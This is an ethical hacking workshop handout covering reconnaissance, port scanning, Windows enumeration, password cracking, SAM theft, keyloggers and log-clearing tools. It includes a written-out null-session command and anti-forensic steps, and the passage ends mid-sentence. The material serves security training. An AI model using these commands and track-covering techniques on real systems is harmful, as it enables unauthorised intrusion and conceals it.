ethical hacking workshop
TRANSCRIPT
Study Material by
Sponsored by
Disclaimer
Material provided here is compiled from different
sources and Technobuzz or Impeccable Trainers do
not guarantee 100% accuracy of information.
If finding something wrong then revert us on
HACKING – The Art of Exploitation
1. INTRODUCTION TO ETHICAL HACKING
Hacking is the most exhilarating game on the planet. But it stops being fun when you end up in a
cell. But hacking doesn't have to mean breaking laws.
In this we teach safe hacking so that you don't have to keep looking back over your shoulders
for narks and cops.
What we're talking about is hacking as a healthy recreation, and as a free education that can qualify
you to get a high paying job. In fact, many network systems administrators, computer scientists
and computer security experts first learned their professions, not in some college program, but from
the hacker culture. And you may be surprised to discover that ultimately the Internet is safeguarded
not by law enforcement agencies, not by giant Corporations, but by a worldwide network of, yes,
HACKERS.
You too, can become one of us.
And Hacking can be surprisingly easy.
However, before you plunge into the hacker subculture, be prepared for that hacker attitude. You
have been warned.
So...welcome to the adventure of HACKING!
WHAT DO I NEED IN ORDER TO HACK?
You may wonder whether hackers need expensive computer equipment and a shelf full of technical
manuals. The answer is NO!
Hacking can be surprisingly easy! Better yet, if you know how to search the Web, you can find
almost any computer information you need for free.
In fact, hacking is so easy that if you have an on-line service and know how
to send and read email, you can start hacking immediately.
We see many hackers making a big deal of themselves and being mysterious and refusing to help
others learn how to hack. Why? Because they don't want you to know the truth, which is that most
of what they are doing is really very simple!
Well, we thought about this. We too, could enjoy the pleasure of insulting people who ask us how
to hack. Or we could get big egos by actually teaching thousands of people how to hack.
HOW NOT TO GET BUSTED?
One slight problem with hacking is that if you step over the line, you can go to jail. We will do our
best to warn you when we describe hacks that could get you into trouble with the law. But we are
not attorneys or experts on cyber law. In addition, every state and every country has its own laws.
And these laws keep on changing. So you have to use a little sense.
But the best protection against getting busted is the Golden Rule. If you are about to do
something that you would not like to have done to you, forget it. Do hacks that make the
world a better place, or that are at least fun and harmless, and you should be able to keep out
of trouble.
ETHICS AND LEGALITIES… Nothing contained in this Cram Session is intended to teach or encourage the use of security tools or
methodologies for illegal or unethical purposes. Always act in a responsible manner. Make sure you
have written permission from the proper individuals before you use any of the tools or techniques
described in this Cram Session.
TERMINOLOGIES Exploit: According to the Jargon Dictionary, an exploit is defined as, vulnerability in software that is
used for breaking security‖. Hackers rely on exploits to gain access to, or to escalate their privileged
status on, targeted systems.
SECURITY TRIANGLE:
SOFTWARE TRIANGLE:
CONFIDENTIALITY
INTEGRITY AVAILABILITY
SECURITY
SECURITY
FUNCTIONALITY EASY TO USE
SOFTWARE
ATTACKER‘s PROCESS:
Attackers follow a fixed methodology. The steps involved in attacks are shown below:
Foot Printing
Scanning
Enumeration
Penetration-(Individuals that are unsuccessful at this step may opt for a Denial of Service
attack)
Escalation of Privilege
Cover Tracks
Backdoors
RECONNAISSANCE:
Reconnaissance is one of the most important steps of the hacking process. Before an actual
Vulnerability can be exploited it must be discovered. Discovery of potential vulnerabilities is aided
by identification of the technologies used, operating systems installed, and services/applications that
are present.
Reconnaissance can broadly be classified into two categories:
Passive Reconnaissance
Active Reconnaissance
TYPES OF ATTACKS:
There are several ways in which hackers can attack your network. No matter which path of
opportunity they choose, their goal is typically the same: control and use of your network and its
resources.
LAN Attack
WAN Attack
Physical Entry
Stolen Equipment
Unsecured Wireless Access
Dialup Attack
CATEGORIES OF EXPLOITS:
An exploit is the act of taking advantage of a known vulnerability. When ethical hackers discover
new vulnerabilities, they usually inform the product vendor before going public with their findings.
This gives the vendor some time to develop solutions before the vulnerability can be exploited.
Some of the most common types of exploits involve: Program bugs, Buffer overflows, Viruses,
Worms, Trojan Horses, Denial of Service and Social Engineering.
GOALS OF HACKER:
While the type of attack may vary, the hacker will typically follow a set methodology. This
includes:
Reconnaissance
Gaining Access
Maintaining Access
Covering Tracks
ETHICAL HACKER & CRACKER:
Historically the term HACKER was not viewed in a negative manner. It was someone that enjoys
exploring the nuances of a programs, applications and operating systems. The term CRACKER
usually refers to a ―Criminal Hacker‖. This person uses his skills for malicious intent.
Q. Who are Ethical Hackers?
Successful ethical hackers possess a variety of skills. First and foremost, they must be completely
trustworthy. Ethical hackers typically have very strong programming and computer networking
skills. They are also adept at installing and maintaining systems that use the more popular operating
systems (e.g., Linux or Windows) used on target systems. These base skills are augmented with
detailed knowledge of the hardware and software provided by the more popular computer and
networking hardware vendors.
CATEGORIES OF ETHICAL HACKER:
White Hat Hackers – perform ethical hacking to help secure companies and organizations.
Reformed Black Hat Hackers – claim to have changed their ways and that they can bring special
insight into the ethical hacking methodology.
Gray Hats-Individuals who work both offensive and defensively according to the situations.
NEED OF INFORMATION TECHNOLOGY IN WORLD:
Security compliance is must for all companies with IT backbone. The requirement is high with
organizations in IT / ITES segment. Information workers lack of basic security knowledge.
Information Security are been offered to professional in IT security
BENEFITS OF INFORMATION TECHNOLOGY:
Be an Information Security Professional. Prepare for Hacking threats of tomorrow. Secure
Desktop, LAN from crackers. Understand attacks via Virus, Worms and Trojans and preventing
them. Implement IDS. Understand Technical attacks like DDOS, SQL injections etc and take
precautions. Secure your sensitive data using cryptography and steganography. Secure your emails
and take precautions from Email attacks. Understand the various levels at which you might get
hacked. Stop Cyber Terrorism. Using Google as an aid to Information Security. Carry out cyber
Investigations and Computer Forensics. Understand Mobile Security and Related Problems. Learn
and implements Router security.
TYPES OF TESTING/EVALUATION:
Internal Evaluation
External Evaluation
Stolen Equipment Evaluations
2. CYBER ETHICS
COMPUTER CRIME:
The United States Department of Justice defines computer crime as "any violation of criminal law
that involved the knowledge of computer technology for its perpetration, investigation, or
prosecution."
VARIOUS LAWS:
Spy Act
U.S Federal Laws
United Kingdom‘s Cyber Laws
European Laws
Japan‘s Cyber Laws
Australia: The Cyber Crime Act 2001
Indian Law: The Information Technology Act
Germany‘s Cyber Law
Singapore‘s Cyber Law
Belgium Law
Brazilian Law
Canadian Law
France Law
Italian Law
―CYBER CRIME‖ is an amorphous field. It refers broadly to any criminal activity that pertains to
or is committed through the use of the Internet. A wide variety of conduct fits within this capacious
definition. We will concentrate on five activities that have been especially notorious and that have
strained especially seriously the fabric of traditional criminal law: use of the Internet to threaten or
stalk people; ONLINE FRAUD; ―HACKING‖; ONLINE DISTRIBUTION OF CHILD
PORNAGRAPHY; & CYBERTERRORISM.
CYBER STALKERS:
"Stalkers harness the tremendous power of the Web to learn about their prey and to
broadcast false information about the people they target. And the Internet - the same
tool they use to investigate and spread terror - provides stalkers with almost
impenetrable anonymity." In cyberspace, stalking and harassment may occur via e-mail
and through user participation in news groups, bulletin boards, and chat rooms. One major
difference from off-line stalking is that cyberstalkers can also dupe other Internet users into
harassing or threatening victims.
The term "CYBERSTALKING" has been coined to refer to the use of the Internet, e-mail,
or other electronic communications devices to stalk another person. Because of the
emerging nature of this form of stalking, the available evidence of cyberstalking is still
largely anecdotal, but it suggests that the majority of cyberstalkers are men and the
majority of their victims are women. As in off-line stalking, in many on-line cases, the
cyberstalker and the victim had a prior relationship, and when the victim attempts to end
the relationship, the cyberstalking begins.
IT ACT 2000(Information Technology Act-2000):
Sec -66. Hacking with computer system.
(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful
loss or damage to the public or any person destroys or deletes or alters any
information residing in a computer resource or diminishes its value or utility or
affects it injuriously by any means, commits hack.
(2) Whoever commits hacking shall be punished with imprisonment up to three years,
or with fine which may extend upto two lakh rupees, or with both.
Sec-67. Publishing of information which is obscene in electronic form.
Whoever publishes or transmits or causes to be published in the electronic form, any
material which is lascivious or appeals to the prurient interest or if its effect is such as
to tend to deprave and corrupt persons who are likely, having regard to all relevant
circumstances, to read, see or hear the matter contained or embodied in it, shall be
punished on first conviction with imprisonment of either description for a term which
may extend to five years and with fine which may extend to one lac rupees and in the
event of a second or subsequent conviction with imprisonment of either description
for a term which may extend to ten years and also with fine which may extend to two
lacs rupees.
Sec-65.Tampering with computer source documents.
Whoever knowingly or intentionally conceals, destroys or alters or intentionally or
knowingly causes another to conceal, destroy or alter any computer source code used
for a computer, computer programme, computer system or computer network, when
the computer source code is required to be kept or maintained by law for the time
being in force, shall be punishable with imprisonment up to three years, or with fine
which may extend up to two lacs rupees, or with both.
Sec-43. Penalty for damage to computer, computer system, etc.
If any person without permission of the owner or any other person who is in charge of
a computer, computer system or computer network,-
(a) Accesses or secures access to such computer, computer system or computer
network;
(b) Downloads, copies or extracts any data, computer data base or information from
such computer, computer system or computer network including information or
data held or stored in any removable storage medium;
(c) Introduces or causes to be introduced any computer contaminant or computer
virus into any computer, computer system or computer network;
(d) Damages or causes to be damaged any computer, computer system or computer
network, data, computer data base or any other programs residing in such
computer, computer system or computer network;
(e) Disrupts or causes disruption of any computer, computer system or computer
network;
(f) Denies or causes the denial of access to any person authorized to access any
computer, computer system or computer network by any means;
(g) Provides any assistance to any person to facilitate access to a computer, computer
system or computer network in contravention of the provisions of this Act, rules
or regulations made there under;
(h) charges the services availed of by a person to the account of another person by
tampering with or manipulating any computer, computer system, or computer
network, he shall be liable to pay damages by way of compensation not
exceeding one crore rupees to the person so affected.
TRAFFICKING:
"Trafficking in counterfeit label for phone records, copies of computer programs or
computer program documentation or packaging, and copies of motion pictures or
other audio visual works."
Law is applicable if:
Persons knowingly traffics in a counterfeit label affixed or designed to be affixed.
Intentionally traffics a counterfeit document or packaging for a computer program.
Penalty:
Fine and Imprisonment is imposed.
3. INFORMATION GATHERING & SCANNING
FOOTPRINTING:
Footprinting is the process of gathering as much information about an organization as possible. The
objective of footprinting is to gather this information in such a way as to not alert the organization.
This information is publicly available from third parties and from organization itself.
WEB BASED TOOLS:
Many web based tools are available to help uncover domain information. This services provide
whois information, DNS information, and network queries.
Eg:
Sam Spade http://www.samspade.org
Geek Tools http://www.geektools.com
Betterwhois http://betterwhois.com
Dshield http://www.dshield.org
IANA
The Internet Assigned Number Authority is a nonprofit organization that is responsible for
preserving the central functions of the global Internet for the public good. IANA is a good starting
point for determining details about a domain. IANA lists all the top level domains of each country
and their associated technical and administrative contacts. Most of the associated domains will
allow you to search by the domain name.
RIR‘s
Regional Internet Registries are granted authority by ICANN to allocate IP address blocks within
their respective geometrical areas. These database are an excellent resource to use to further
research a domain once you have determined what area of the world it is located in.
Domain Location and Path Discovery
If you are unsure of a domain‘s location, the best way to determine its location is by use of the
traceroute command. Traceroute determines a path to a domain by incrementing the TTL field of
the IP header. When the TTL falls to zero, an ICMP message is generated. These ICMP messages
identify each particular hop on the path to the destination. There are several good GUI based
traceroute tools available. These tools draw a visual map that displays the path and destination
NeoTrace & VisualRoute are two GUI based tools that maps path and destination.
ARIN, RIPE AND Regional Databases
RIR, s is searchable by IP address. If you have the domain name, you can resolve to the IP by
pinging the domain name. RIR‘s and their area of control include:
American Registry for International Numbers(ARIN)
Reseaux IP Europeans Network Coordination(RIPE)
Asia Pacific Network Information Center(APNIC)
African Regional Internet Registry(AFRINIC)
Latin American and Caribbean Network Information Center(LACNIC)
Determining the Network Range
You can query the RIR to find out what network range the organization owns. If you chose the
wrong RIR, you will typically receive an error message that will point you to the correct record
holder.
Discovering the Organization‘s Technology
There are many ways in which individuals can passively determine the technology an organization
uses. Some examples are JOB BOARDS & GOOGLE GROUPS.
Email Tips & Tricks
The Simple Mail Transfer Protocol is used for sending Email. Every Email you receive has a
header that contains information such as the IP address of the server sending the message, the
names of any attachments included with the Email and the time and date the Email was sent and
received.
Bouncing Email
One popular technique is to send an email to an invalid email address. The sole purpose of this
activity is to examine the SMTP header that will be returned. This may reveal the Email server‘s IP
address, application type and the version. Other way to track interesting email is to use software
that will allow you to verify where the email originated and how the recipient handled it, such as
emailtraking pro and mailTracking.com.
SCANNING:
Once a hacker has moved to the scanning phase his goal will be identify active systems. There are
several ways this identification can take place. The methods of identification of active systems
include:
War Dialing
War Driving
Pinging
Port Scanning
Regardless of the method chosen the goal is still the same:
Identify that the system is live
Determine its services
Verify its OS
Pinpoint its vulnerabilities
War Dialing
While some may see war dialing as a dated art, it still has its place in the hacker‘s arsenal of tools.
If a thorough footprint has been performed, phone numbers were most likely found that can be
associated to the organization. The numbers can serve as a starting point for war dialing scans.
The hacker‘s goal will be to uncover modems that may have been left open. Administrators may
have configured these for out-of-band management. The goal of an ethical hacker is to uncover
these devices during the security audit to make sure they are removed, as modems offer a way to
bypass the corporate firewall. The tools most commonly used for war dialing include: THC-Scan,
PhoneSweep War Dialer and Telesweep.
War Driving
This mode of penetration relies on finding unsecured wireless access points. A popular tool used
for this operation is Netstumbler.
ICMP – Ping
Using the ping command is one of the easiest ways to determine if a system is reachable. Ping is
actually an ICMP(Internet Control Message Protocol) echo request-response. Its original purpose
was to provide diagnostic abilities to determine whether a network or device was reachable. The
important thing to remember about ping is that just because a system does not respond to ping, that
doesn‘t mean that it is not up. It might simply mean that ICMP type 0 and/or type 8 messages have
been blocked by the target organization. There are many tools available that can be used to
automate the ping process. These tools will typically ping sweep an entire range of addresses.
Some of these include: Pinger, Friendly Pinger, WS_Ping_Pro, NetScan Tools Pro 2000,
Hping2, and KingPing.
Detecting Ping Sweeps
Most IDS systems, such as SNORT, will detect ping sweeps. While performing a ping sweep is
not illegal, it should alert an administrator, as it is generally part of the pre-attack phase.
Port Scanning
Port scanning allows a hacker to determine what services are running on the systems that have been
identified. If vulnerable or insecure services are discovered, the hacker may be able to exploit
these to gain unauthorized access. There are a total of 65,535 * 2 ports (TCP & UDP). While a
complete scan of all these ports may not be practical, an analysis of popular ports should be
performed. Many port scanners ping first, so make sure to turn this feature off to avoid missing
systems that have blocked ICMP.Popular port scanning programs include: Nmap, Netscan Tools,
Superscan and Angry IP Scanner.
TCP Basics
As TCP is a reliable service, a 3-step startup is performed before data is transported. ACK‘s are
sent to acknowledge data transfer and a four-step shut down is completed at the end of a
communications session. TCP uses flags (Urgent, Acknowledgement, Push, Reset, Synchronize,
and Finish) to accomplish these tasks. Port scanners manipulate these flag settings to bypass
firewalls and illicit responses from targeted systems.
TCP Scan Types
Most port scanners make full TCP connections. Stealth scanners do not make full connections
and may not be detected by some IDS systems. Nmap is one of the most popular port scanners.
Some common types of ports scans are: Ping Scan, SYN Scan, Full Scan, ACK Scan and XMAS
Scan.
UDP Basics
UDP is a connectionless protocol. If ICMP has been blocked at the firewall, it can be much harder
to scan for UDP ports than TCP ports, as there may be no returned response. Just as with TCP,
hackers will look for services that can be exploited such as chargen, daytime, tftp, and echo. One
of the best UDP and TCP port scanners is Nmap.
Nmap (network mapper) is an open source port scanner that has the capability to craft
packets in many different ways. This allows the program to determine what services an OS is
running.
Port Scan Countermeasures
Practice the principle of least privilege. Don‘t leave unneeded ports open and block ICMP echo
requests at the firewall or external router. Allow traffic through the external router to only specific
hosts.
Fingerprinting
Fingerprinting is the process of determining the OS that is running on the
target system.
I. Active Stack Fingerprinting-
Active stack fingerprinting relies on subtle differences in the responses to specially
crafted packets. The most well-known program used for active stack fingerprinting is
Nmap. The –0 option is used for fingerprinting. For a reliable prediction, one open
port and one closed port is required.
II. Passive Stack Fingerprinting-
Passive fingerprinting is less reliable than active fingerprinting. Its primary advantage
is that it is stealthy. It relies on capturing packets sent from the target system.
Banner Grabbing
Banner grabbing is used to identify services. Banner grabbing works by making connections to the
various services on a host and looking at the response to hopefully determine the exact service and
version running on that port. Once these services are confirmed, this information can help to
identify possible vulnerabilities and the OS that the system is running. Netcraft, Telnet and FTP
are some of the common tools used to grab banners.
Identifying Vulnerabilities
Once a hacker has completed the scanning steps described in this section, he will attempt to
identify vulnerabilities. Vulnerabilities are typically flaws or weaknesses in the software or the
OS. Vulnerabilities lead to risk and this presents a threat to the target being scanned. Three terms
to remember include:
Vulnerability - A flaw or weakness in software.
OS Risk - The likelihood of a threat exploiting vulnerability such that a hacker will be allowed
unauthorized access or create a negative impact.
Threat - The potential for a hacker to use vulnerability.
Enumeration:
Enumeration is the process of identifying each domain that is present within the LAN. These
domains are typically identified using built-in Windows commands. The ―net command‖ is the
most widely used of these commands. Once the various domains have been identified, each host
can be further enumerated to uncover its role. Likely targets of malicious hackers include: PDC‘s,
dual homed computers, database servers, and web servers. The very act of Windows
enumeration is possible because these computers advertise themselves via browse lists. To see a
good example of this technology, take a look at Network Neighborhood on Windows systems.
These services are identifiable by the ports that can be found while performing the network scans
that were discussed in the previous section. The ports associated with these services are as follows:
135 – MS-RPC Endmapper
137 – NetBIOS Name Service
138 – NetBIOS Datagram Service
139 – NetBIOS Session Service
445 – SMB over TCP/IP (Windows 2K and above)
NetBIOS Null Sessions
Once individual computers are identified, malicious hackers will next attempt to discover the role
of the system by using NetBIOS Null Sessions. The legitimate purpose of a Null Session is to
allow unauthenticated computers to obtain browse lists from servers, allow system accounts access
to network resources, or to allow a null session pipe. A null session pipe is used when a process on
one system needs to communicate with a process on another system. Legitimate null sessions are
established over the IPC$ share.
The Inter-Process Communication Share
Windows computers communicate with each other over the IPC$ "Inter-Process
Communication" share. It is used for data sharing between applications and computers. In
Windows NT and 2000 computers, it is on by default. You can think of IPC$ as the pipeline that
facilitates file and print sharing. This is a huge vulnerability as hackers can connect to your IPC$
share using the net use command (net use \\IP\IPC$ "" /u:""). Once this connection has been
made, many types of sensitive information can be retrieved, such as user names, comments,
shares, and logon policies. What is most alarming about this vulnerability is that the attacker is
able to logon with a null username and null password.
NBTSTAT
The NBTSTAT command can be used to further identify the services that are running on a
particular system. For a listing of the type codes and their corresponding service, visit the following
link:
http://jcifs.samba.org/src/docs/nbtcodes.html
Active Directory Enumeration
To perform an Active Directory enumeration, you must have access to port 389 (LDAP Server).
You must also be able to authenticate yourself as a guest or user. Then, if these conditions are met,
enumeration of users and groups can proceed. Removing compatibility with all pre-windows 2000
computers during the installation of Active Directory can prevent this vulnerability.
Identifying Win2000 Accounts
Every object in Windows has a unique security identifier (SID). The SID is made up of two parts.
The first part identifies the domain and is unique to it. The second part is a descriptor of the
specific account. This second part is referred to as the relative identifier (RID). These follow a
specific order and are tied to unique roles within the domain. RID's are defined as follows:
Account RID
Administrator 500
Guest 501
Domain users 1000 (and up)
So, while some administrators may promote the practice ―security through obscurity‖ and rename
accounts such as administrator, the RID of the account will remain unchanged. Tools such as
USER2SID and SID2USER can be used to determine the true administrator account of the
domain.
DumpSec
DumpSec is another tool that will allow for account enumeration. Once a null session has been
established, this GUI tool will display information on users, account data, shares, and account
policies.
Null Session Countermeasures
Disable File and Print sharing. Inside network properties, under Advanced Settings, disable
NetBIOS over TCP/IP. Null sessions require access to ports 135-139 or 445. Blocking access to
these ports will also prevent these exploits. There is also a setting in Settings -> Control Panel ->
Administrative Tools –> Local Security Policy –> Local Policies –> Security Options –>
Restrict Anonymous. In Windows 2000, this registry key has three possible settings:
0 – No Restrictions
1 - Allow null sessions but disallow account enumeration
2 - No null sessions are allowed
The default setting is ―0‖. A setting of ―2‖ should be verified on a test network before use in a
production setting as some older or custom applications may not function properly with it.
Account Enumeration
Account enumeration is a further probing of accounts. Before a concerted attack can take place,
account policies and shares must be uncovered. As well, before attempting to connect to an active
account, the attacker must identify an open share to which he can connect. Also, if there is a lock
out policy in place, this must be determined. Otherwise, running tools such as NAT may result in
the lockout of all accounts. This will do the attacker little good unless he is attempting DoS. Tools
such as Enum, User Info, GetAcct, and SNMPUtil can be used to accomplish this task.
SNMP Enumeration
SNMP (Simple Network Management Protocol) is a network management standard widely used
within TCP/IP networks. It provides a means of managing routers, switches, and servers from
a central location. It works through a system of agents and managers. SNMP provides only
limited security through the use of community strings. The defaults are ―public‖ and ―private‖
and are transmitted over the network in clear text. Devices that are SNMP enabled, share a lot
of information about each device that probably should not be shared with unauthorized parties.
Hence consider changing the default passwords‘ community strings.
SNMPUtil is a Windows enumeration tool that can be used to query computers running
SNMP.
IP Network Browser
SolarWinds IP Network Browser is a GUI based network discovery tool. It allows you to scan a
detailed discovery on one device or an entire subnet.
SNMP Enumeration Countermeasures
As with all other services, the principle of least privilege should also be followed here. If you don‘t
need SNMP, turn it off. You should always seek to remove or disable all unnecessary services. If
you must use SNMP, change the default community strings and block port 161 at key points
throughout the network.
4. WINDOWS HACKING & SYSTEM ATTACKS
System/Windows hacking is the point at which the line is crossed and an actual connection is made.
It is the first true attack phase as the attacker is actually breaking and entering. This may be
achieved by an administrative connection or an enumerated share.
Identifying Shares
One of the easiest ways to enumerate shares is with the net view command. This will identify all
public shares. Hidden shares, those followed by a ―$‖ will not be displayed. Common hidden
shares include: IPC$, C$, D$ and Admin$ There are several GUI tools that can be used to identify
non-hidden and hidden shares, such as, DumpSec and Legion.
Password Guessing
Many times, password guessing is successful because people like to use easy to remember words
and phrases. A diligent attacker will look for subtle clues throughout the enumeration process to
key in on probable words or phrases the account holder may have used for a password. Accounts
that will be focused on for possible attack include:
Accounts that haven‘t changed passwords
Service accounts
Shared accounts
Accounts that indicate the user has never logged in
Accounts that have information in the comment field that may compromise password
security
Manual Password Guessing
Assuming that a vulnerable account has been identified, the most common method of attack is
manual password guessing. The net use command can be issued from the command line to
attempt the connection.
Performing Automated Password Guessing
If manual password cracking was unsuccessful, attackers will most likely turn to automated tools.
Most automated password guessing tools use dictionaries to try to crack accounts. These attacks
can be automated from the command line by using the ―FOR‖ command or they can also be
attempted by using tools such as NAT or ENUM. To use NAT, two files would first need to be
created. The first would contain a list of possible user names, while the second would comprise a
dictionary file. Each user name would be attempted with every word in the dictionary until a match
was achieved or all possibilities were exhausted.
Password Guessing Countermeasures
Password guessing is made much more difficult when administrators use strict password policies.
These policies should specify passwords that:
Are complex
Contain upper case and lower case letters
Use numbers, letters, and special characters
It is not uncommon to hear individuals talk about pass-phrases; this concept helps users realize that
common words are not robust passwords. Another excellent password guessing countermeasure is
to simply move away from passwords completely. Of the three types of authentication (see below),
passwords are the weakest:
Something You Know - Passwords
Something You Have - Smart Cards
Something You Are – Biometrics
Monitoring Event Viewer Logs
No matter which form of authentication you choose, policies should be in place that require the
regular review of event logs. Attacks cannot be detected if no one is monitoring activity. Luckily,
there are tools to ease the burden of log file review and management. VisualLast is a tool that
makes it easy to assess the monitor log activity and has a number of sophisticated features.
Sniffing Passwords
Windows uses a challenge / response authentication method that is based on the NTLM
protocol. The protocol requires a client to contact a server for domain authentication and a hash is
passed. NTLM also functions in a peer-to-peer network. Through the years, NTLM has evolved.
The three basic forms of NTLM are listed below:
LAN Manager – Insecure, used for Windows 3.11, 95, and 98 computers
NTLM V1 – Used for Windows NT Service Pack 3 or earlier
NTLM V2 – A more secure version of challenge response protocol used by Windows 2000
and XP
One problem with NTLM is that it is backwards compatible by default. This means if the network
contains Windows 95/98 computers, the protocol will step down to the weaker form of
authentication to try to allow authentication. This can be a big security risk. It is advisable to
disable this by making a change to the Local Policies Security Options template. Another
problem with NTLM is that tools have been developed that can extract the passwords from the
logon exchange. One such set of tools is ScoopLM and BeatLM from
http://www.securityfriday.com ; another is L0phtCrack. NTLM is not the only protocol that might
be sniffed on an active network. Tools also exist to capture and crack Kerberos authentication.
The Kerberos protocol was developed to provide a secure means for mutual authentication
between a client and a server. Kerberos is found in large complex network environments. One of
the tools that might be used to attempt to defeat this protocol is KerbCrack.
Privilege Escalation
If by this point the attacker has compromised an account, but not one of administrator status, the
amount of damage he can do is limited. To be in full control of the system, the attacker needs
administrator status. This is achieved through privilege escalation. What makes this most
difficult is that these exploits must typically be run on the system under attack. Three ways this
may be achieved:
Trick the user into executing a particular program.
Copy the privilege escalation program to the system and schedule it to run at a
predetermined time
Gain interactive access to the system.
Retrieving the SAM File
One of the first activities that an attacker will usually attempt after gaining administrative access is
that of stealing the SAM (Security Account Manager) file. The SAM contains the user account
passwords stored in their hashed form. Microsoft raised the bar with the release of NT service
pack 3. Products newer than this release contain a second layer of encryption called the SYSKEY.
Even if an attacker obtains the SYSKEY hash, he must still defeat its 128-bit encryption. Todd
Sabin found a way around this through the process of DLL injection and created a tool called
Pwdump. This tool allows the attacker to hijack a privileged process and bypass SYSKEY
encryption. Pwdump requires administrative access.
Cracking Windows Passwords
Once the passwords have been stolen, they will need to be cracked. This can be accomplished by
using a password-cracking program. Password cracking programs can mount several different
types of attacks. These include:
Dictionary Attack
Hybrid Attack
Brute Force Attack.
Windows Password Insecurities
One of the big insecurities of Windows passwords is that if the WIN2K domain is set up to be
backwards compatible, the passwords are 14 characters or less. This version of the hash is
known as the LanManager (LANMAN) Hash. What makes LANMAN quickly crackable is that
while the password can be up to 14 characters, the passwords are actually divided into two 7
character fields. Thus, cracking can proceed simultaneously against each 7-character field.
Several tools are available to exploit this weakness, including, L0phtCrack and John the Ripper.
Password Cracking Countermeasures
The domain password policy should be configured to restrict users from using the same password
more than once or at least configured where eight to ten new passwords must be used before an
individual can reuse an old password again. This policy can be enforced through the local / domain
security policy. Passwords:
Should be at least 7 or 14 characters long
Should be upper and lower case
Should be numbers, letters, and special characters (*! &@#%$)
Should have a maximum life of no more than 30-days
Another countermeasure to password cracking is to use one-time passwords. There are several
different one-time password schemes available. The most widely used replacement is the smart
cards; SecurID is a popular choice.
SMB Redirection
An SMB (Server Message Block) redirect attack may be attempted by tricking a user to
authenticate to a bogus SMB server. This allows the attacker to capture the victim‘s hashed
credentials. This may be attempted by tricking the user to click on a link embedded in an e-mail.
Users should always use caution when clicking on e-Mail links. Several tools are available to help
attackers pull off this hack. One of these tools is SMBRelay, a fraudulent SMB server used to
capture usernames and passwords.
Physical Access
If an attacker can gain physical access to your facility or equipment, he‘ll own it. Without
physical access control, all administrative and technical barriers can typically be overcome. This
holds true for any piece of equipment. Even routers are not immune. Cisco‘s website details how
to reset passwords if you have physical access. http://www.cisco.com/warp/public/474/
Many programs are available that can be used to bypass NTFS security or to reset the
administrator password. Some of the programs are: Offline NT Password Resetter, NTFSDOS
and LinNT.
Keystroke Logging
Keystroke loggers can be hardware or software based. These programs will log and capture all
the keystrokes a user types. Some of these programs, such as eBlaster, will even secretly e-mail
the captured keystrokes to a predetermined e-mail account.
Keystroke Loggers (or Keyloggers) intercept the Target‘s keystrokes and either saves them in a
file to be read later, or transmit them to a predetermined destination accessible to the Hacker.
Since Keystroke logging programs record every keystroke typed in via the keyboard, they can
capture a wide variety of confidential information, including passwords, credit card numbers,
and private Email correspondence, names, addresses, and phone numbers.
Some Famous Keyloggers
Actual Spy
Perfect Keylogger
Family Keylogger
Home Keylogger
Soft Central Keylogger
Adramax Keylogger
Rootkits
Rootkits are malicious code that is developed for the specific purpose of allowing hackers to gain
expanded access to a system and hide their presence. While rootkits have been available in the
Linux world for many years, they are now starting to make their way into the Windows
environment. Rootkits are considered freeware and are readily available on the Internet. If you
suspect a computer has been rootkitted, you‘ll need to use an MD5 checksum utility or a program
such as Tripwire to determine the viability of your programs. The only other alternative is to
rebuild the computer from known good media.
Evidence Hiding
Once an attacker has gained full control of the victim‘s computer, he will typically try to cover his
tracks. According to Locard's Exchange Principle, ―whenever someone comes in contact with
another person, place, or thing, something of that person is left behind.‖ This means the
attacker must clear log files, eliminate evidence, and cover his tracks. A common tool the
attacker will use to disable logging is the auditpol command. The attacker will also attempt to
clear the log. This may be accomplished with the Elsave command. This will remove all entries
from the logs, except one showing the logs were cleared. Other tools an attacker may attempt to
use at this point include Winzapper and Evidence Eliminator.
File Hiding
Various techniques are used by attackers in an attempt to hide their tools on the compromised
computer. Some attackers may just attempt to use attrib to hide files, while others may place their
warez in low traffic areas; e.g., winnt/system32/os2drivers. One of the most advanced file
hiding techniques is NTFS File Streaming. A tool that is available to detect streamed files is Sfind.
Data Hiding
Other data hiding techniques deal with moving information in and out of networks undetected. This
can be accomplished through the use of bitmaps, MP3 files, Whitespace hiding, and others. Each
is briefly described below:
Steganography- The art of hiding text inside of images
ImageHide – A Stego program
MP3Stego – A Stego program that hides text in MP3 files
Snow – A Stego program that hides text in the whitespace inside of documents
Camera/Shy – Used to hide text in web based images
While there are tools such as StegDetect that can sometimes find these files, that by no way means
you will be able to break their encryption and uncover the contents.
Prompting the Box
The final step for the attacker is that of becoming the target. Up to this point, the attacker has been
able to maintain a connection to the target, but may not yet have the ability to execute and run
programs locally. The following three tools will allow the attacker to become the target: Psexec,
Remoxec, and Netcat. When the attacker has a command prompt on the victim‘s computer, he will
typically restart the methodology looking for other internal targets to attack and compromise.
5. GOOGLING/GOOGLE HACKING
Google Searching Basics:
Building Google Queries:
Google query building is a process. There‘s really no such thing as an incorrect search. It‘s
entirely possible to create an ineffective search, but with the explosive growth of the Internet and
the size of Google‘s cache, a query that‘s inefficient today may just provide good results
tomorrow—or next month or next year. The idea behind effective Google searching is to get a
firm grasp on the basic syntax and then to get a good grasp of effective narrowing techniques.
Learning the Google query syntax is the easy part. Learning to effectively narrow searches can take
quite a bit of time and requires a bit of practice. Eventually, you‘ll get a feel for it, and it will
become second nature to find the needle in the haystack.
Golden Rules of Google Searching:
1. Google queries are not case sensitive.
Google doesn‘t care if you type your query in lowercase letters (hackers), uppercase
(HACKERS), camel case (hAcKeR), or psycho-case (haCKeR)—the word is always
regarded the same way.
2. Google wildcards
Google‘s concept of wildcards is not the same as a programmer‘s concept of wildcards.
Most consider wildcards to be either a symbolic representation of any single letter (UNIX
fans may think of the question mark) or any series of letters represented by an asterisk.
This type of technique is called stemming. Google‘s wildcard, the asterisk (*), represents
nothing more than a single word in a search phrase. Using an asterisk at the beginning or
end of a word will not provide you any more hits than using the word by itself.
3. Google stems automatically.
Google will stem, or expand, words automatically when it‘s appropriate. For example,
consider a search for pet lemur dietary needs, as shown in Figure 1.12. Google will return
a hit that includes the word lemur along with pet and, surprisingly, the word diet, which
is short for dietary. Keep in mind that this automatic stemming feature can provide you
with unpredictable results.
4. Google reserves the right to ignore you
Google ignores certain common words, characters, and single digits in a search. These
are sometimes called stop words. When Google ignores any of your search terms, you
will be notified on the results page, just below the query box, as shown in Figure 1.13.
Some common stop words include who, where, what, the, a, or an. Curiously enough, the
logic for word exclusion can vary from search to search.
5. Ten-word limit
Google limits searches to 10 terms. This includes search terms as well as advanced
